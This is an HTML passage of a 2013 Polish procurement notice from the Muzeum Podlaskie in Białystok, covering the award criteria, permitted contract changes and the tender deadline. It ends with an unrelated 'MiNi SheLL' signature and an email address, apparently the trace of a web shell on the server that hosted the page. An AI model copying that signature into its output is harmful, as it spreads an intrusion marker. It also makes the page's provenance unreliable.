<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do  treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
a) zmiany stawki podatku VAT, przy założeniu, że cena brutto ulegnie zmianie w stopniu  wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostanie bez zmian,
b)  zmiany przedstawicieli stron umowy,
c) przedłużenia terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę o czas niezbędny do należytego wykonania zamówienia, jednakże nie dłuższy niż czas trwania okoliczności je powodujących, w przypadku:
 - przekroczenia określonych przepisami prawa terminów wydania przez organy  administracji decyzji, zezwoleń, itp., lub odmowę ich wydania,
- konieczności zaspokojenia roszczeń lub oczekiwań osób trzecich, uzyskania decyzji lub orzeczeń niemożliwych do stwierdzenia w chwili zawarcia umowy,
       - warunki atmosferyczne uniemożliwiające prowadzenie robót.
      d) jeżeli konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami, tj. działania siły wyższej, 
e) zmniejszenia z uwagi na uzasadnione potrzeby Zamawiającego, zakresu prac wraz z proporcjonalnym zmniejszeniem wynagrodzenia,
f) konieczności wprowadzenia zmian, będących następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie
15-426 Bialystok
Ratusz - Rynek Kościuszki 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2013 godzina 09:30, miejsce: Muzeum Podlaskie
15-426 Bialystok
Ratusz - Rynek Kościuszki 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com